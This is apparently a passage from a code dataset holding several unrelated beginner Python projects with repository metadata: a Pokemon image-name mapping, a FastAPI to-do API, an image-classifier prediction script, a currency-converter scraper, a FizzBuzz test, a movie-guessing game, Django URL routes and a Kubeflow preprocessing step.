\"66.png\",\n \"Machoke\" : \"67.png\",\n \"Machamp\" : \"68.png\",\n \"Bellsprout\": \"69.png\",\n \"Weepinbell\": \"70.png\",\n \"Victreebel\": \"71.png\",\n \"Tentacool\" : \"72.png\",\n \"Tentacruel\": \"73.png\",\n \"Geodude\" : \"74.png\",\n \"Graveler\" : \"75.png\",\n \"Golem\" : \"76.png\",\n \"Ponyta\" : \"77.png\",\n \"Rapidash\" : \"78.png\",\n \"Slowpoke\" : \"79.png\",\n \"Slowbro\" : \"80.png\",\n \"Magnemite\" : \"81.png\",\n \"Magneton\" : \"82.png\",\n \"Farfetch'd\": \"83.png\",\n \"Doduo\" : \"84.png\",\n \"Dodrio\" : \"85.png\",\n \"Seel\" : \"86.png\",\n \"Dewgong\" : \"87.png\",\n \"Grimer\" : \"88.png\",\n \"Muk\" : \"89.png\",\n \"Shellder\" : \"90.png\",\n \"Cloyster\" : \"91.png\",\n \"Gastly\" : \"92.png\",\n \"Haunter\" : \"93.png\",\n \"Gengar\" : \"94.png\",\n \"Onix\" : \"95.png\",\n \"Drowzee\" : \"96.png\",\n \"Hypno\" : \"97.png\",\n \"Krabby\" : \"98.png\",\n \"Kingler\" : \"99.png\",\n \"Voltorb\" : \"100.png\",\n \"Electrode\" : \"101.png\",\n \"Exeggcute\" : \"102.png\",\n \"Exeggutor\" : \"103.png\",\n \"Cubone\" : \"104.png\",\n \"Marowak\" : \"105.png\",\n \"Hitmonlee\" : \"106.png\",\n \"Hitmonchan\": \"107.png\",\n \"Lickitung\" : \"108.png\",\n \"Koffing\" : \"109.png\",\n \"Weezing\" : \"110.png\",\n \"Rhyhorn\" : \"111.png\",\n \"Rhydon\" : \"112.png\",\n \"Chansey\" : \"113.png\",\n \"Tangela\" : \"114.png\",\n \"Kangaskhan\": \"115.png\",\n \"Horsea\" : \"116.png\",\n \"Seadra\" : \"117.png\",\n \"Goldeen\" : \"118.png\",\n \"Seaking\" : \"119.png\",\n \"Staryu\" : \"120.png\",\n \"Starmie\" : \"121.png\",\n \"Mr. Mime\" : \"122.png\",\n \"Scyther\" : \"123.png\",\n \"Jynx\" : \"124.png\",\n \"Electabuzz\": \"125.png\",\n \"Magmar\" : \"126.png\",\n \"Pinsir\" : \"127.png\",\n \"Tauros\" : \"128.png\",\n \"Magikarp\" : \"129.png\",\n \"Gyarados\" : \"130.png\",\n \"Lapras\" : \"131.png\",\n \"Ditto\" : \"132.png\",\n \"Eevee\" : \"133.png\",\n \"Vaporeon\" : \"134.png\",\n \"Jolteon\" : \"135.png\",\n \"Flareon\" : \"136.png\",\n \"Porygon\" : \"137.png\",\n \"Omanyte\" : \"138.png\",\n \"Omastar\" : \"139.png\",\n \"Kabuto\" : \"140.png\",\n \"Kabutops\" : \"141.png\",\n \"Aerodactyl\": \"142.png\",\n \"Snorlax\" : \"143.png\",\n \"Articuno\" : \"144.png\",\n \"Zapdos\" : \"145.png\",\n \"Moltres\" : \"146.png\",\n \"Dratini\" : \"147.png\",\n \"Dragonair\" : \"148.png\",\n \"Dragonite\" : \"149.png\",\n \"Mewtwo\" : \"150.png\",\n \"Mew\" : \"151.png\",\n \"Chikorita\" : \"152.png\",\n \"Bayleef\" : \"153.png\",\n \"Meganium\" : \"154.png\",\n \"Cyndaquil\" : \"155.png\",\n \"Quilava\" : \"156.png\",\n \"Typhlosion\": \"157.png\",\n \"Totodile\" : \"158.png\",\n \"Feraligatr\": \"159.png\",\n \"Sentret\" : \"160.png\",\n \"Furret\" : \"161.png\",\n \"Hoothoot\" : \"162.png\",\n \"Noctowl\" : \"163.png\",\n \"Ledyba\" : \"164.png\",\n \"Ledian\" : \"165.png\",\n \"Spinarak\" : \"166.png\",\n \"Ariados\" : \"167.png\",\n \"Ariados\" : \"168.png\",\n \"Crobat\" : \"169.png\",\n \"Chinchou\" : \"170.png\",\n \"Lanturn\" : \"171.png\",\n \"Pichu\" : \"172.png\",\n \"Cleffa\" : \"173.png\",\n \"Igglybuff\" : \"174.png\",\n \"Togepi\" : \"175.png\",\n \"Togetic\" : \"176.png\",\n \"Natu\" : \"177.png\",\n \"Xatu\" : \"178.png\",\n \"Mareep\" : \"179.png\",\n \"Flaaffy\" : \"180.png\",\n \"Ampharos\" : \"181.png\",\n \"Bellossom\" : \"182.png\",\n \"Marill\" : \"183.png\",\n \"Azumarill\" : \"184.png\",\n \"Sudowoodo\" : \"185.png\",\n \"Politoed\" : \"186.png\",\n \"Hoppip\" : \"187.png\",\n \"Skiploom\" : \"188.png\",\n \"Jumpluff\" : 
\"189.png\",\n \"Aipom\" : \"190.png\",\n \"Sunkern\" : \"191.png\",\n \"Sunflora\" : \"192.png\",\n \"Yanma\" : \"193.png\",\n \"Wooper\" : \"194.png\",\n \"Quagsire\" : \"195.png\",\n \"Espeon\" : \"196.png\",\n \"Umbreon\" : \"197.png\",\n \"Murkrow\" : \"198.png\",\n \"Slowking\" : \"199.png\",\n \"misdreavus\": \"200.png\",\n \"Unown\" : \"201.png\",\n \"Wobbuffet\" : \"202.png\",\n \"Girafarig\" : \"203.png\",\n \"Pineco\" : \"204.png\",\n \"Forretress\": \"205.png\",\n \"Dunsparce\" : \"206.png\",\n \"Gligar\" : \"207.png\",\n \"Steelix\" : \"208.png\",\n \"Snubbull\" : \"209.png\",\n \"Granbull\" : \"210.png\",\n \"Qwilfish\" : \"211.png\",\n \"Scizor\" : \"212.png\",\n \"Shuckle\" : \"213.png\",\n \"Heracross\" : \"214.png\",\n \"Sneasel\" : \"215.png\",\n \"Teddiursa\" : \"216.png\",\n \"Ursaring\" : \"217.png\",\n \"Slugma\" : \"218.png\",\n \"Magcargo\" : \"219.png\",\n \"Swinub\" : \"220.png\",\n \"Piloswine\" : \"221.png\",\n \"Corsola\" : \"222.png\",\n \"Remoraid\" : \"223.png\",\n \"Octillery\" : \"224.png\",\n \"Delibird\" : \"225.png\",\n \"Mantine\" : \"226.png\",\n \"Skarmory\" : \"227.png\",\n \"Houndour\" : \"228.png\",\n \"Houndoom\" : \"229.png\",\n \"Kingdra\" : \"230.png\",\n \"Phanpy\" : \"231.png\",\n \"Donphan\" : \"232.png\",\n \"Porygon2\" : \"233.png\",\n \"Stantler\" : \"234.png\",\n \"Smeargle\" : \"235.png\",\n \"Tyrouge\" : \"236.png\",\n \"Hitmontop\" : \"237.png\",\n \"Smoochum\" : \"238.png\",\n \"Elekid\" : \"239.png\",\n \"Magby\" : \"240.png\",\n \"Miltank\" : \"241.png\",\n \"Blissey\" : \"242.png\",\n \"Raikou\" : \"243.png\",\n \"Entei\" : \"244.png\",\n \"Suicune\" : \"245.png\",\n \"Lavitar\" : \"246.png\",\n \"Pupitar\" : \"247.png\",\n \"Tyranitar\" : \"248.png\",\n \"Lugia\" : \"249.png\",\n \"Ho-Oh\" : \"250.png\",\n \"Celebi\" : \"251.png\",\n \"Treecko\" : \"252.png\",\n \"Grovyle\" : \"253.png\",\n \"Sceptile\" : \"254.png\",\n \"Torchic\" : \"255.png\",\n \"Combusken\" : \"256.png\",\n \"Blaziken\" : \"257.png\",\n \"Mudkip\" : \"258.png\",\n \"Marshtomp\" : \"259.png\",\n \"Swampert\" : \"260.png\",\n \"Poochyena\" : \"261.png\",\n \"Mightyena\" : \"262.png\",\n \"Zigzagoon\" : \"263.png\",\n \"Linoone\" : \"264.png\",\n \"Wurmple\" : \"265.png\",\n \"Silcoon\" : \"266.png\",\n \"Beautifly\" : \"267.png\",\n \"Cascoon\" : \"268.png\",\n \"Dustox\" : \"269.png\",\n \"Lotad\" : \"270.png\",\n \"Lombre\" : \"271.png\",\n \"Ludicolo\" : \"272.png\",\n \"Seedot\" : \"273.png\",\n \"Nuzleaf\" : \"274.png\",\n \"Shiftry\" : \"275.png\",\n \"Taillow\" : \"276.png\",\n \"Swellow\" : \"277.png\",\n \"Wingull\" : \"278.png\",\n \"Pelipper\" : \"279.png\",\n \"Ralts\" : \"280.png\",\n \"Kirlia\" : \"281.png\",\n \"Gardevoir\" : \"282.png\",\n \"Surskit\" : \"283.png\",\n \"Masquerain\" : \"284.png\",\n \"Shroomish\" : \"285.png\",\n \"Breloom\" : \"286.png\",\n \"Slakoth\" : \"287.png\",\n \"Vigoroth\" : \"288.png\",\n \"Slaking\" : \"289.png\",\n \"Nincada\" : \"290.png\",\n \"Ninjask\" : \"291.png\",\n \"Shedinja\" : \"292.png\",\n \"Whismur\" : \"293.png\",\n \"Loudred\" : \"294.png\",\n \"Exploud\" : \"295.png\",\n \"Makuhita\" : \"296.png\",\n \"Hariyama\" : \"297.png\",\n \"Azurill\" : \"298.png\",\n \"Nosepass\" : \"299.png\",\n \"Skitty\" : \"300.png\",\n \"Delcatty\" : \"301.png\",\n \"Sableye\" : \"302.png\",\n \"Mawile\" : \"303.png\",\n \"Aron\" : \"304.png\",\n \"Lairon\" : \"305.png\",\n \"Aggron\" : \"306.png\",\n \"Meditite\" : \"307.png\",\n \"Medicham\" : \"308.png\",\n \"Electrike\" : \"309.png\",\n \"Manectric\" : 
\"310.png\",\n \"Plusle\" : \"311.png\",\n \"Minum\" : \"312.png\",\n \"Volbeat\" : \"313.png\",\n \"Illumise\" : \"314.png\",\n \"Roselia\" : \"315.png\",\n \"Gulpin\" : \"316.png\",\n \"Swalot\" : \"317.png\",\n \"Carvanha\" : \"318.png\",\n \"Sharpedo\" : \"319.png\",\n \"Wailmer\" : \"320.png\",\n \"Wailord\" : \"321.png\",\n \"Numel\" : \"322.png\",\n \"Camerupt\" : \"323.png\",\n \"Torkoal\" : \"324.png\",\n \"Spoink\" : \"325.png\",\n \"Grumpig\" : \"326.png\",\n \"Spinda\" : \"327.png\",\n \"Trapinch\" : \"328.png\",\n \"Vibrava\" : \"329.png\",\n \"Flygon\" : \"330.png\",\n \"Cacnea\" : \"331.png\",\n \"Cacturne\" : \"332.png\",\n \"Swablu\" : \"333.png\",\n \"Altaria\" : \"334.png\",\n \"Zangoose\" : \"335.png\",\n \"Seviper\" : \"336.png\",\n \"Lunatone\" : \"337.png\",\n \"Solrock\" : \"338.png\",\n \"Barboach\" : \"339.png\",\n \"Wiscash\" : \"340.png\",\n \"Corphish\" : \"341.png\",\n \"Crawdaunt\" : \"342.png\",\n \"Baltoy\" : \"343.png\",\n \"Claydol\" : \"344.png\",\n \"Lileep\" : \"345.png\",\n \"Cradily\" : \"346.png\",\n \"Anorith\" : \"347.png\",\n \"Armaldo\" : \"348.png\",\n \"Feebas\" : \"349.png\",\n \"Milotic\" : \"350.png\",\n \"Castform\" : \"351.png\",\n \"Kecleon\" : \"352.png\",\n \"Shuppet\" : \"353.png\",\n \"Banette\" : \"354.png\",\n \"Duskull\" : \"355.png\",\n \"Dusclops\" : \"356.png\",\n \"Tropius\" : \"357.png\",\n \"Chimecho\" : \"358.png\",\n \"Absol\" : \"359.png\",\n \"Wynaut\" : \"360.png\",\n \"Snorunt\" : \"361.png\",\n \"Glalie\" : \"362.png\",\n \"Spheal\" : \"363.png\",\n \"Sealeo\" : \"364.png\",\n \"Walrein\" : \"365.png\",\n \"Clamperl\" : \"366.png\",\n \"Huntail\" : \"367.png\",\n \"Gorebyss\" : \"368.png\",\n \"Relicanth\" : \"369.png\",\n \"Luvdisc\" : \"370.png\",\n \"Bagon\" : \"371.png\",\n \"Shelgon\" : \"372.png\",\n \"Salamence\" : \"373.png\",\n \"Beldum\" : \"374.png\",\n \"Metang\" : \"375.png\",\n \"Metagross\" : \"376.png\",\n \"Regirock\" : \"377.png\",\n \"Regice\" : \"378.png\",\n \"Registeel\" : \"379.png\",\n \"Latias\" : \"380.png\",\n \"Latios\" : \"381.png\",\n \"Kyogre\" : \"382.png\",\n \"Groudon\" : \"383.png\",\n \"Rayquaza\" : \"384.png\",\n \"Jirachi\" : \"385.png\",\n \"Deoxys\" : \"386.png\",\n \"Turtwig\" : \"387.png\",\n \"Grotle\" : \"388.png\" ,\n \"Torterra\" : \"389.png\" , \n \"Chimchar\" : \"390.png\" , \n \"Monferno\" : \"391.png\" , \n \"Infernape\" : \"392.png\" ,\n \"Piplup\" : \"393.png\" , \n \"Prinplup\" : \"394.png\" , \n \"Empoleon\" : \"395.png\" , \n \"Starly\" : \"396.png\" ,\n \"Staravia\" : \"397.png\" ,\n \"Staraptor\" : \"398.png\" ,\n \"Bidoof\" : \"399.png\" ,\n \"Babarel\" : \"400.png\" ,\n \"Kricketot\" : \"401.png\" ,\n \"Kricketune\" : \"402.png\" ,\n \"Shinx\" : \"403.png\" ,\n \"Luxio\" : \"404.png\" ,\n \"Luxray\" : \"405.png\" ,\n \"Budew\" : \"406.png\" ,\n \"Roserade\" : \"407.png\" ,\n \"Cranidos\" : \"408.png\" ,\n \"Rampardos\" : \"409.png\" ,\n \"Shieldon\" : \"410.png\" ,\n \"Bastiodon\" : \"411.png\" ,\n \"Burmy\" : \"412.png\" ,\n \"Wormadam\" : \"413.png\" ,\n \"Mothim\" : \"414.png\" ,\n \"Combee\" : \"415.png\" ,\n \"Vespiquen\" : \"416.png\" ,\n \"Pachirisu\" : \"417.png\" ,\n \"Buizel\" : \"418.png\" ,\n \"Floatzel\" : \"419.png\" ,\n \"Cherubi\" : \"420.png\" ,\n \"Cherrim\" : \"421.png\" ,\n \"Shellos\" : \"422.png\" ,\n \"Gastrodon\" : \"423.png\" ,\n \"Ambipom\" : \"424.png\" ,\n \"Drifloon\" : \"425.png\" ,\n \"Drifblim\" : \"426.png\" ,\n \"Buneary\" : \"427.png\" ,\n \"Lopunny\" : \"428.png\" ,\n \"Mismagius\" : \"429.png\" ,\n \"Honchkrow\" : 
\"430.png\" ,\n \"Glameow\" : \"431.png\" ,\n \"Purugly\" : \"432.png\" ,\n \"Chingling\" : \"433.png\" ,\n \"Stunky\" : \"434.png\" ,\n \"Stunktank\" : \"435.png\" ,\n \"Bronzor\" : \"436.png\" ,\n \"Bronzong\" : \"437.png\" ,\n \"Bonsly\" : \"438.png\" ,\n \"Mime Jr.\" : \"388.png\" ,\n \"Happiny\" : \"389.png\" , \n \"Chatot\" : \"390.png\" , \n \"Spiritomb\" : \"391.png\" ,\n \"Gible\" : \"392.png\" , \n \"Gibite\" : \"393.png\" , \n \"Garchomp\" : \"394.png\" , \n \"Munchlax\" : \"395.png\" ,\n \"Riolu\" : \"396.png\" ,\n \"Lucario\" : \"397.png\" ,\n \"Hippopotas\" : \"398.png\" ,\n \"Hippowdon\" : \"399.png\" ,\n \"Skorupi\" : \"400.png\" ,\n \"Drapion\" : \"401.png\" ,\n \"Croagunk\" : \"402.png\" ,\n \"Toxicroak\" : \"403.png\" ,\n \"Carnivine\" : \"404.png\" ,\n \"Finneon\" : \"405.png\" ,\n \"Lumineon\" : \"406.png\" ,\n \"Mantyke\" : \"407.png\" ,\n \"Snover\" : \"408.png\" ,\n \"Abomasnow\" : \"409.png\" ,\n \"Weavile\" : \"410.png\" ,\n \"Magnezone\" : \"411.png\" ,\n \"Lickilicky\" : \"412.png\" ,\n \"Rhyperior\" : \"413.png\" ,\n \"Tangrowth\" : \"414.png\" ,\n \"Electivire\" : \"415.png\" ,\n \"Magmortar\" : \"416.png\" ,\n \"Togekiss\" : \"417.png\" ,\n \"Yanmega\" : \"418.png\" ,\n \"Leafeon\" : \"419.png\" ,\n \"Glaceon\" : \"420.png\" ,\n \"Gliscor\" : \"421.png\" ,\n \"Mamoswine\" : \"422.png\" ,\n \"Porygon-z\" : \"423.png\" ,\n \"Gallade\" : \"424.png\" ,\n \"Probopass\" : \"425.png\" ,\n \"Dusknoir\" : \"426.png\" ,\n \"Frosslass\" : \"427.png\" ,\n \"Rotom\" : \"428.png\" ,\n \"Uxie\" : \"429.png\" ,\n \"Mesprit\" : \"430.png\" ,\n \"Azelf\" : \"431.png\" ,\n \"Dialga\" : \"432.png\" ,\n \"Palkia\" : \"433.png\" ,\n \"Heatran\" : \"434.png\" ,\n \"Regigigas\" : \"435.png\" ,\n \"Giratina\" : \"436.png\" ,\n \"Cresselia\" : \"437.png\" ,\n \"Phione\" : \"438.png\" ,\n \"Manaphy\" : \"439.png\" ,\n \"Darkrai\" : \"440.png\" ,\n \"Shaymin\" : \"441.png\" ,\n \"Arceus\" : \"442.png\" ,\n}","repo_name":"KevinLu19/PokemonGame","sub_path":"Pokemon/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":13851,"program_lang":"python","lang":"hr","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"3680875758","text":"from typing import List\nfrom unicodedata import name\nfrom uuid import uuid4\n\nfrom fastapi import Depends, FastAPI, HTTPException, status\nfrom sqlalchemy.orm import Session\n\nfrom database import engine, get_session\nfrom models import Base, TodoList, ListItem\nfrom schemas import ListItemRequest, ListItemResponse, ListRequest, ListResponse\n\nBase.metadata.create_all(engine)\napp = FastAPI()\n\n\n@app.get(\"/\")\ndef read_root():\n \"\"\"\n API information.\n \"\"\"\n return {\"message\": \"Mudapp to-do list, for all your shit.\"}\n\n\n@app.get(\"/list\", response_model=List[ListResponse])\ndef get_all_lists(session: Session = Depends(get_session)):\n \"\"\"\n Return a list of all to-do lists stored by the app.\n \"\"\"\n response = []\n lists = session.query(TodoList).all()\n for list in lists:\n items = session.query(ListItem).filter_by(id=list.id).all()\n list_response = ListResponse(\n id=list.id,\n name=list.name,\n items=[\n ListItemResponse(\n id=item.id,\n name=item.name,\n completed=item.completed,\n due_date=item.due_date if item.due_date else None,\n )\n for item in items\n ],\n )\n response.append(list_response)\n\n return response\n\n\n@app.post(\"/list\", response_model=ListResponse, status_code=status.HTTP_201_CREATED)\ndef create_list(request: ListRequest, session: Session = Depends(get_session)):\n 
\"\"\"\n Create a to-do list using the request content.\n \"\"\"\n # create list\n todo_list = TodoList(name=request.name)\n session.add(todo_list)\n session.commit()\n\n # create list items\n list_items = []\n if request.items:\n list_items = [\n ListItem(\n name=item.name,\n completed=False,\n due_date=item.due_date,\n id=todo_list.id\n ) for item in request.items\n ]\n session.add_all(list_items)\n session.commit()\n\n return ListResponse(id=todo_list.id, name=request.name, items=list_items)\n\n\n@app.get(\"/list/{id}\", response_model=ListResponse)\ndef get_list(id: int, session: Session = Depends(get_session)):\n \"\"\"\n Return a specific list by ID.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n\n return ListResponse(id=list.id, name=list.name, items=list.items)\n\n\n@app.put(\"/list/{id}\", response_model=ListResponse)\ndef rename_list(\n id: int, request: ListRequest, session: Session = Depends(get_session)\n):\n \"\"\"\n Rename an existing to-do list.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n list.name = request.name\n session.commit()\n\n return ListResponse(id=list.id, name=list.name, items=list.items)\n\n\n@app.delete(\"/list/{id}\")\ndef delete_list(id: int, session: Session = Depends(get_session)):\n \"\"\"\n Delete an existing to-do list.\n \"\"\"\n list: TodoList = session.query(TodoList).get(id)\n if list is None:\n raise HTTPException(status_code=404, detail=\"List not found.\")\n session.delete(list)\n session.commit()\n\n return {\"message\": \"List deleted.\"}\n","repo_name":"manudawber/mudapp","sub_path":"mudapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"11652327676","text":"import tensorflow as tf\nimport tensorflow_hub as hub\nfrom PIL import Image\nimport numpy as np\nimport argparse\nimport json\n\n\n\n\nimage_path=\"./test_images/\"\n\n\n\n##Load the model\nsaved_model=\"my_model.h5\"\nmodel=tf.keras.models.load_model(saved_model,custom_objects={'KerasLayer':hub.KerasLayer})\nmodel.summary()\n\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-i\",\"--image\", help=\"./test_images/\", required=False, default=None)\nparser.add_argument(\"-m\",\"--model\", help=\"my_model.h5\", required=False,default=None)\nparser.add_argument(\"-k\",\"--top_k\", help=\"top k probs of the image\",required=False, default=3)\nparser.add_argument(\"-c\",\"--category_names\",help=\"classes\",required=False,default=None)  # default None so the guard below can detect a missing argument\n\nargs = vars(parser.parse_args())\n\nimage_path = args['image']\nsaved_model = args['model']\ntop_k = args['top_k']\ncategory_names = args['category_names']\nimage_size = 224\n\n\n\n# Create the process_image function\ndef process_image(numpy_image):\n print(numpy_image.shape)\n tensor_img=tf.image.convert_image_dtype(numpy_image, dtype=tf.int16, saturate=False)\n resized_img=tf.image.resize(numpy_image,(image_size,image_size)).numpy()\n normal_img=resized_img/255\n\n return normal_img \n\n# Create the predict function\ndef predict(image_path, model, top_k=3):\n #if top_k < 1:\n # top_k = 1\n image = Image.open(image_path)\n image = np.asarray(image)\n image = process_image(image)\n expanded_image = np.expand_dims(image, axis=0)\n probes = model.predict(expanded_image)\n top_k_values, top_k_indices = tf.nn.top_k(probes, 
k=top_k)\n \n top_k_values = top_k_values.numpy()\n top_k_indices = top_k_indices.numpy()\n \n \n\n return top_k_values, top_k_indices, image\n\n\ntop_k_values, top_k_indices, image = predict(image_path, model, top_k=int(top_k))\nif category_names != None:\n with open(category_names, 'r') as f:\n class_names = json.load(f)\n print(\"Classes Values:\")\n for idx in top_k_indices[0]:\n print(\"-\",class_names[str(idx+1)])\n\n\nprint('Probabilities:', top_k_values)\nprint('Classes Keys:', top_k_indices) \n \n \n","repo_name":"aldovazquez90/Image_classifier_project_udacity","sub_path":"predict1.py","file_name":"predict1.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10840948288","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom babel.numbers import format_currency\n\nos.system(\"cls\")\n\n\"\"\"\nUse the 'format_currency' function to format the output of the conversion\nformat_currency(AMOUNT, CURRENCY_CODE, locale=\"ko_KR\" (no need to change this one))\n\"\"\"\n\ndef transferwise_crawl(transferurl):\n url = transferurl\n result = requests.get(url)\n soup = BeautifulSoup(result.text, \"html.parser\")\n \n div1 = soup.find(\"span\",{\"class\":\"text-success\"}).string\n \n\n rate = float(div1)\n # print(converted)\n return rate\n\n\ndef crawl():\n url = \"https://www.iban.com/currency-codes\"\n \n iban_result = requests.get(url)\n iban_soup = BeautifulSoup(iban_result.text, \"html.parser\")\n\n table = iban_soup.find(\"table\", {\"class\": \"table table-bordered downloads tablesorter\"})\n\n tbody = table.find(\"tbody\")\n tds = tbody.find_all(\"td\")\n\n information = {}\n length = len(tds)\n key = 0\n country = []\n for i in range(0, length, 4):\n if tds[i + 1].string == \"No universal currency\":\n continue\n else:\n country.append(tds[i].string.capitalize())\n country.append(tds[i + 1].string.capitalize())\n country.append(tds[i + 2].string)\n country.append(tds[i + 3].string)\n information[key] = country\n key = key + 1\n country = []\n\n return information\n\ndef caculator(money, value):\n return money * value\n \ndef main():\n country_dic = crawl()\n print(\"Welcome to CurrencyConvert PRO 2000: \\n\")\n\n for i in range(len(country_dic)):\n print('# {} {}'.format(i, country_dic[i][0]))\n\n print(\"Where are you from? 
Choose a country by number.\\n\")\n from_num = int(input(\"#: \"))\n print(f\"{country_dic[from_num][0]}\\n\")\n\n print(\"Now choose another country.\\n\")\n another_country_num = int(input(\"#: \"))\n print(f\"{country_dic[another_country_num][0]}\\n\")\n\n while (True):\n try:\n print(f\"How many {country_dic[from_num][2]} do you want to convert to {country_dic[another_country_num][2]}\")\n money = int(input())\n break\n except:\n print(\"That wasn't a number.\\n\")\n continue\n\n\n transfer_url = \"https://transferwise.com/gb/currency-converter/\"+ str(country_dic[from_num][2].lower())+\"-to-\"+str(country_dic[another_country_num][2].lower())+\"-rate\"+\"?amount=\"+str(money)+\"#rate-alerts\"\n value = transferwise_crawl(transfer_url)\n result = caculator(money, value)\n\n print(format_currency(money,country_dic[from_num][2],locale=\"ko_KR\")+\" is \",end='')\n print(format_currency(result,country_dic[another_country_num][2],locale=\"ko_KR\"))\n\nmain()","repo_name":"cheonjiwan/python_challenge","sub_path":"assignment/Day6.py","file_name":"Day6.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"34366372883","text":"from scripts.hackerrank.fizzBuzz import fizzBuzz\n\nclass Test:\n test_cases = [\n [15, [1, 2, \"Fizz\", 4, \"Buzz\", \"Fizz\", 7, 8, \"Fizz\", \"Buzz\", 11, \"Fizz\", 13, 14, \"FizzBuzz\"]]\n ]\n testable_functions = [fizzBuzz]\n\n def test_fizz_buzz(self):\n for f in self.testable_functions:\n for case, expected in self.test_cases:\n assert f(case) == expected\n\n ","repo_name":"TrellixVulnTeam/learning_to_test_code_BL81","sub_path":"tests/hackerrank/test_fizzBuzz.py","file_name":"test_fizzBuzz.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"12232321199","text":"import random\n\n#create a list of all movies for the game\nlistofmovies=['avengers endgame','star wars the force awakens','avengers infinity war','jurassic world','the lion king','furious seven','black panther','harry potter',\n'frozen','beauty and the beast','incredibles two','iron man three','minions','aquaman','aladdin','finding dory','zootopia','spectre','spider man homecoming','batman v superman','hunger games'\n]\n#list of all vowels to remove everything except them from the name of the movie \nvowels=['a','e','i','o','u']\n#list of alphabets of 'hollywood' to cut them one by one everytime the user makes a wrong guess\nstring=['h','o','l','l','y','w','o','o','d']\n\n#choosing random movie from list of movies\nchoosen=random.choice(listofmovies)\n'''okay so quite a bit to explain here...\nfirst we remove the spaces from the name of movie using the split function which splits the string from there is a space\n'''\nremove_spaces=choosen.split(' ')\n\n'''secondly we take the previous variable and put a '/' where there was a space in the name using the join function\nif you feel it is too many functions, don't fret just head over to python docs to read about every function that I have used here'''\n\nchoosen='/'.join(remove_spaces)\n\n#create empty list to get the final string that is formatted to our desire\ntoshow=[]\n\ntempstring=string\nfor x in choosen:\n if x in vowels:\n toshow.append(x)\n elif x=='/': \n toshow.append('/')\n else:\n 
toshow.append('_')\n","repo_name":"vandanrohatgi/HW-python-project","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35597809308","text":"from django.urls import path\nfrom .views import (\n ItemListView,\n AddToCartView,\n OrderDetailView,\n AddCouponView,\n PaymentView,\n ItemDetailView,\n OrderItemDeleteView,\n OrderQuantityUpdateView,\n AddressListView,\n AddressCreateView,\n AddressUpdateView,\n AddressDeleteView,\n CountryListView,\n RegionListView,\n CityListView,\n UserIDView,\n OrderHistoryView,\n )\n\nurlpatterns = [\n path('products/', ItemListView.as_view(), name='product-list'),\n path('products/<pk>/', ItemDetailView.as_view(), name='product-detail'),\n path('add-to-cart/', AddToCartView.as_view(), name='add-to-cart'),\n path('order-summary/', OrderDetailView.as_view(), name='order-summary'),\n path('order-items/<pk>/delete/', OrderItemDeleteView.as_view(), name='order-item-delete'),\n path('order-items/update-quantity/', OrderQuantityUpdateView.as_view(), name='order-item-update-quantity'),\n path('add-coupon/', AddCouponView.as_view(), name='add-coupon'),\n path('addresses/', AddressListView.as_view(), name='address-list'),\n path('checkout/', PaymentView.as_view(), name='checkout'),\n path('order-history/', OrderHistoryView.as_view(), name='order-history'),\n path('user-id/', UserIDView.as_view(), name='user-id'),\n path('addresses/create/', AddressCreateView.as_view(), name='address-create'),\n path('addresses/<pk>/update/', AddressUpdateView.as_view(), name='address-update'),\n path('addresses/<pk>/delete/', AddressDeleteView.as_view(), name='address-delete'),\n path('countries/', CountryListView.as_view(), name='countries'),\n path('regions/', RegionListView.as_view(), name='regions'),\n path('cities/', CityListView.as_view(), name='cities'),\n]\n","repo_name":"kyleherring180/DjangoReactEcommerce","sub_path":"backend/src/core/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"42466113523","text":"# preprocess data\nfrom kfp.components import InputPath, OutputPath  # assumed KFP import so the path annotations below resolve\n\ndef preprocess_data(load_data_path: InputPath(str), \n preprocess_data_path: OutputPath(str)):\n \n # import Library\n import sys, subprocess;\n subprocess.run([\"python\", \"-m\", \"pip\", \"install\", \"--upgrade\", \"pip\"])\n subprocess.run([sys.executable, '-m', 'pip', 'install','pandas'])\n subprocess.run([sys.executable, '-m', 'pip', 'install','scikit-learn'])\n import os, pickle;\n import pandas as pd\n import numpy as np\n from sklearn.model_selection import train_test_split\n\n #loading the train data\n with open(f'{load_data_path}/all_data', 'rb') as f:\n ntrain, all_data = pickle.load(f)\n \n # split features and label\n all_data_X = all_data.drop('label', axis=1)\n all_data_y = all_data.label\n \n # Reshape image in 3 dimensions (height = 28px, width = 28px , channel = 1)\n all_data_X = all_data_X.values.reshape(-1,28,28,1)\n\n # Normalize the data\n all_data_X = all_data_X / 255.0\n \n #Get the new dataset\n X = all_data_X[:ntrain].copy()\n y = all_data_y[:ntrain].copy()\n \n # split into train and test\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)\n \n #creating the preprocess directory\n os.makedirs(preprocess_data_path, exist_ok = True)\n \n #Save the train_data as a pickle file to be used by the modelling component.\n with 
